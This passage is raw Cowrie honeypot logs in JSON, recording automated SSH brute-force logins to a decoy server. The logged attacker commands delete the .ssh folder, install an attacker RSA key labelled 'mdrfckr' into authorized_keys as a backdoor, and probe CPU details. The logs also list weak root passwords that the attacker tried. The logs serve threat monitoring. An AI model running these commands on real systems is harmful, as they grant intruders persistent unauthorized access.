@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:12.300385Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49794,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d50e793150d","protocol":"ssh","message":"New connection: 212.227.235.229:49794 (1.2.3.4:22) [session: 6d50e793150d]","sensor":"my-vps","timestamp":"2025-09-08T22:19:12.639811Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456~","message":"login attempt [root/Aa123456~] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:13.504553Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:14.106731Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:14.107418Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:14.108302Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:14.218084Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:14.218915Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:14.399744Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:15.091726Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.092546Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx3edc","message":"login attempt [root/!QAZ2wsx3edc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.223754Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.385424Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.386548Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54498,"dst_ip":"1.2.3.4","dst_port":22,"session":"f35013c274ec","protocol":"ssh","message":"New connection: 212.227.235.229:54498 (1.2.3.4:22) [session: f35013c274ec]","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.678020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.679205Z","src_ip":"212.227.235.229","session":"f35013c274ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:15.752924Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.753599Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.754479Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:15.970584Z","src_ip":"212.227.235.229","session":"f35013c274ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:16.834982Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:17.151453Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.152117Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.176468Z","src_ip":"212.227.235.229","session":"f35013c274ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.407746Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.408616Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49796,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd4565628bfd","protocol":"ssh","message":"New connection: 212.227.235.229:49796 (1.2.3.4:22) [session: fd4565628bfd]","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.654292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:17.655428Z","src_ip":"212.227.235.229","session":"fd4565628bfd"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:18.470014Z","src_ip":"212.227.235.229","session":"f35013c274ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54504,"dst_ip":"1.2.3.4","dst_port":22,"session":"201723ef59ec","protocol":"ssh","message":"New connection: 212.227.235.229:54504 (1.2.3.4:22) [session: 201723ef59ec]","sensor":"my-vps","timestamp":"2025-09-08T22:19:18.763601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:18.764519Z","src_ip":"212.227.235.229","session":"201723ef59ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:19.058197Z","src_ip":"212.227.235.229","session":"201723ef59ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:19.401968Z","src_ip":"212.227.235.229","session":"fd4565628bfd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:20.272491Z","src_ip":"212.227.235.229","session":"201723ef59ec"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:20.564952Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:20.567794Z","src_ip":"212.227.235.229","session":"201723ef59ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:22.602567Z","src_ip":"212.227.235.229","session":"fd4565628bfd"}
{"eventid":"cowrie.session.closed","duration":12.79342269897461,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:22.867809Z","src_ip":"202.107.95.221","session":"1e57a64c3a0e"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":40745,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d3bdba3114e","protocol":"telnet","message":"New connection: 202.107.95.221:40745 (1.2.3.4:23) [session: 3d3bdba3114e]","sensor":"my-vps","timestamp":"2025-09-08T22:19:23.075860Z"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:23.857983Z","src_ip":"212.227.235.229","session":"fd4565628bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43496,"dst_ip":"1.2.3.4","dst_port":22,"session":"32f26d16cd80","protocol":"ssh","message":"New connection: 212.227.235.229:43496 (1.2.3.4:22) [session: 32f26d16cd80]","sensor":"my-vps","timestamp":"2025-09-08T22:19:24.105952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:24.107347Z","src_ip":"212.227.235.229","session":"32f26d16cd80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:24.361731Z","src_ip":"212.227.235.229","session":"32f26d16cd80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60844,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b16707b678","protocol":"ssh","message":"New connection: 212.227.235.229:60844 (1.2.3.4:22) [session: e5b16707b678]","sensor":"my-vps","timestamp":"2025-09-08T22:19:28.914728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:28.929390Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:29.143675Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.login.success","username":"root","password":"Sy123456","message":"login attempt [root/Sy123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.099624Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:30.586155Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.586957Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.587976Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.590067Z","src_ip":"212.227.235.229","session":"32f26d16cd80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:30.615885Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.616868Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.795831Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:30.873458Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:31.257504Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
